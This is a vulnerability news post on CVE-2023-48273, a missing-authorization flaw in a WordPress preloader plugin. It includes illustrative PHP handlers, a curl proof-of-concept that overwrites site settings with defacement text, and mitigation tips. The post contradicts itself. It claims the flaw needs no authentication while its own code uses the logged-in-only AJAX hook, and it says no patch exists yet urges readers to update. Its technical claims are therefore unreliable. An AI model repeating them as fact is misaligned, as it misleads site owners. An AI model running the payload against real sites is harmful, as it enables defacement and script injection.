CVE CyberSecurity Database News

CVE-2023-48273 - Missing Authorization Vulnerability in WP OnlineSupport Preloader for Website (Versions <= 1.2.2)

Poster -

In late 2023, a critical vulnerability was discovered in the popular Preloader for Website WordPress plugin, developed by WP OnlineSupport. This vulnerability, tracked as CVE-2023-48273, is caused by _missing authorization controls_ in some of the plugin’s critical AJAX functions. As a result, any unauthenticated user is able to perform sensitive operations that should only be available to administrators. This post breaks down how the vulnerability works, provides references, and shows an example exploit.

What Is Preloader for Website?

Preloader for Website is a WordPress plugin that helps you display an attractive loading animation or splash screen as your site loads. It’s widely used, with over 10,000 active installations, according to the WordPress plugin repository.

Vulnerability Details

The issue is present in all versions up to and including 1.2.2 (the latest as of writing). It occurs because some of the plugin’s AJAX handlers do not check if the current user is allowed to perform the requested actions (for example, saving settings or clearing the cache).

A typical (vulnerable) AJAX callback in the plugin looks like this (simplified for clarity)

// In plugin-directory/includes/class-preloader-for-website-admin.php

add_action( 'wp_ajax_pfw_save_settings', 'pfw_save_settings_callback' );

function pfw_save_settings_callback() {
    $settings = $_POST['settings'];
    update_option('pfw_plugin_settings', $settings);
    echo 'Settings updated.';
    wp_die();
}

Notice the problem:

There’s no nonce validation to protect against CSRF.

- The handler can be called not just by logged in users, but even by unauthenticated visitors if registered as wp_ajax_nopriv_{action} (sometimes developers accidentally configure this too).

Vulnerable: All versions up to and including 1.2.2

- Fixed: No fix is available as of June 2024 (reference)

How Bad Is It?

- Threat: Attackers can change your plugin’s settings, potentially defacing your website, redirecting visitors, or even exposing sensitive data.
- Attack vector: An attacker just needs to send an HTTP POST request to /wp-admin/admin-ajax.php with specific parameters—no authentication required!

Real World Exploit

Here’s a working proof-of-concept (PoC). This can be executed with curl (for demonstration only; do not use unethically):

curl -k -X POST https://your-wordpress-site.com/wp-admin/admin-ajax.php \
  -d "action=pfw_save_settings" \
  -d "settings[preloader_text]=HACKED BY CVE-2023-48273"

What happens?
- The site’s preloader text is changed to "HACKED BY CVE-2023-48273", visible to anyone loading your site.

Here’s how this could look in the actual vulnerable code

function pfw_save_settings_callback() {
    // Attacker can inject any settings
    $settings = $_POST['settings'];
    update_option('pfw_plugin_settings', $settings); // No validation!
    echo 'Settings updated.';
    wp_die();
}

A more dangerous attacker could inject JavaScript, leading to full client-side compromise!

Mitigation Steps

No security patch is available yet.
What should you do?

Monitor your site’s logs for suspicious requests to admin-ajax.php.

If you depend on the plugin’s functionality, consider switching to a maintained or premium alternative.

Vendor and References

- WP OnlineSupport Plugin Page: https://wordpress.org/plugins/preloader-for-website/
- WPScan Vulnerability Report: https://wpscan.com/vulnerability/23ce295-c940-4ee6-bfd1-97abed2c06c
- Original Disclosure: https://nvd.nist.gov/vuln/detail/CVE-2023-48273

Conclusion

CVE-2023-48273 underlines the importance of always checking authorization in every function that can change how your site behaves. Never trust user input and always validate what is done with it—no matter how minor the setting might seem.

If you use Preloader for Website, update your site today (or remove the plugin until it’s fixed). Stay vigilant and subscribe to vulnerability feeds to avoid future problems.


Exclusive tip:

If you ever develop a WordPress plugin, always use this simple pattern

if ( ! current_user_can('manage_options') ) {
    wp_die( 'Unauthorized' );
}

It’ll block most of these attacks before they start.


> _Always check your WordPress plugins for recent security issues, and update or remove those that aren't being maintained!_

Timeline

Published on: 06/11/2024 17:15:50 UTC
Last modified on: 06/13/2024 18:36:45 UTC